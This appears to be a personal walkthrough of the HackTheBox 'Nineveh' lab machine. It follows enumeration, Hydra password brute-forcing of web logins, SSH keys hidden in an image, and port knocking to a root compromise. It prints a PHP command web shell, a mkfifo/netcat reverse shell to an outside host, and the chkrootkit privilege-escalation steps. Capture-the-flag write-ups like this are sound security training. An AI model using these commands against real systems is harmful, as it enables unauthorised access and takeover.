HACKTHEBOX NINEVEH WALKTHROUGH (OSCP STYLE)
Box Details:
OS: Linux
Exploitable service: vulnerable web application (LFI and public exploit), chkrootkit, knockd
Difficulty: Medium
Estimated time: 3 hours
Lessons learnt from the box: Essential web directory bruteforcing, username enumeration via webpage, password brute forcing with hydra, weak passwords was used, Steganography, vulnerable php web app(LFI and RCE), knockd port knocking, check for listening port. Vulnerable application running on server made privesc to root possible. Use pspy to check running process/cronjobs on serveer
NMAP ENUM
Nmap Fast scan
Nmap Full scan
Nmap all ports
Web Enumeration 80 & 443
Port 80
Dir Burst
command = gobuster dir -u http^C/10.10.10.43 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 40
use second wordlist = common.txt
gobuster revealed on port 80 /department, /info.php and /server-status directories.
we enumerate further all discovered directories and found /department has a login.php page which we will enumerate for defaults passwords.
Checking page source of the login page for hints we discover possible admin and amrois usernames and more hints.
Trying a couple of passwords with the username we notice the webpage is vulnerable to username enumeration.
When admin is used “Invalid Password!” is the error
when amrois or other user names are used it says “invalid username” which suggest admin is likely to be the password.
We will bruteforce this using hydra later on.
Port 443 enumeration
Visiting the webpage on https
we further Dir bruteforce with gobuster to check for hidden directories
we find /db, /secure_notes /server-status and index.html dirs and enumerate them further.
/dp appears to a vulnerable phplitadmin web application with a public exploit on the web https://www.exploit-db.com/exploits/24044 , it is vulnerable to remote code execution but first i will need to be an authenticated user.
The exploit is self explanatory and i will need to create a new database and rename its extension to php, then inputs php commands. Yes! A php shell will do.
/secure_notes present a nineveh.png which is suspect might be a steganograph cause it just looks creepy with its egyptian hieroglyphs. I suspect there is an hidden code inside and will investigate further.
i download the image with wget –no-check-certificate and use binwalk to check for hidden files.
There are hidden files in there
seems to be ssh keys (weird because SSH isn’t running on the server)
Since we can do anything with the keys we continue further enumeration.
Password brute forcing with hydra
hydra is installed my default on kali
we need to craft a hydra request. You can go throught the man pages for hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form “/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect” -t 50
-l for username
-P for password wordlist
10.10.10.43 is the victime
http-post-form or https-post-form : the method hydra will use to submit the login request via post
/db/index.php is another field seperated by a colon, its the location of the login page on the server
password=^PASS^&remember=yes&login=Log+In&proc_login=true: this are contents of the post request, hydra fills in the worldlist in ^PASS^
Incorrect is the parameter i hydra would use as a filter to differentiate the succesful login.
We will replicate the same for Port 80 Directory
Examine the request with the developer module on firefox/ inspect elements and check the network tab to get parameters of the post request. Repeat the same for the Port 80 login page
password brute forcing with hydra
password for port 443 phpliteadmin page is password123
password for port 80 /department page is 1q2w3e4r5t
becareful when crafting your hydra commands as a single mistake like an upper case letter in the web dir would produce no results and you would waste a lot of time. This happend to me.
Login into port 80 page we see its a custom web app
futher enumeration suggest the Notes pages has a possible LFI vulnerability which we will confirm.
There is also a note to check the secret folder we saw earlier, were we discovered ssh keys but ssh isnt running on the server (could this be a rabbit hole)
Testing for LFI using Burpsuite took a long while but eventually was successful. When “filen/ninvehNotes.txt” was removed an error was out that notes was selected.
we discover amrois and roots are the only users on the box.
Exploiting the phpLiteAdmin application
we login with the discovered password and follow the steps in the public exploit. https://www.exploit-db.com/exploits/24044
Note Location of file: Database ‘/var/tmp/test’ has been renamed to ‘/var/tmp/test.php’.
I input this as my shell <?php echo system($_REQUEST[‘cmd’]);?>
I have an error which seems to be the quote on ‘cmd ’ i will replace this with “cmd”.
And this works
we’ve got remote code execution, and can now run a reverse shell command.
Reverse shell: &cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.11 443 >/tmp/f
set up a netcat listner and we got a shell
Time to privesc
www-data is a limited and wont have much permissions so I’ll use linpease to sh.
Use python http server and wget to transfer files from attacking machine to victim
make linpeas.sh executable and run
found some intersting paths
Found ssh listen on port 22 strange!
Reading amrois mail, we discover that this could be a case of port knocking.
Port knocking disables and enables port, just like a firewall but you have to follow a sequence of ports before your destination port is opened. Read more here https://www.howtogeek.com/442733/how-to-use-port-knocking-on-linux-and-why-you-shouldnt/
From root@nineveh.htb Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
Amrois! please knock the door next time! 571 290 911
we have to know on port 571 290 911 to open port 80 .
we confirm the ports to knock by reading the /etc/knockd.conf file
the ports have to knocked in the correct sequence
we do this using knock on kali installed by apt install knockd
we use nmap to confirm the state of the ports, and verify its now open.
Privesc to amrois
remember we had ssh keys from the steganograph, yes we will use the ssh key to gain access.
we can now read user.txt file.
Privesc to root.
We run linpeas.sh as amrois to see what we can find
we find the /report as unexpected folders in root
we will investigate this further.
We go to the directory and discover newly created files within a space of 1 minute, we look the report and see there reports that are related to scan for rootkits, worms, viruses and anything malicious
we have to investigate this further using pspy64 to check real time for running processes on the server as they execute. Download the compactible pspy for the server architecture from https://github.com/DominicBreuker/pspy
use uname -a to check your victims architecture.
And transfer to victim using wget
now use pspy to check running services. Monitor for about 3 minutes
the culprit happens to be /usr/bin/chkrootkit running as a cron job and creating does reports there is also a cronjob for amrois user to delete the reports.
we google chkrootkit to see what we can find
we couldnt verify the version of chkrootkit so we will try our luck with this exploit. https://www.exploit-db.com/exploits/33899
its not a script and we will follow the steps in the POC
Steps to reproduce:- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
now I’ve followed the steps in the exploit poc, now i wait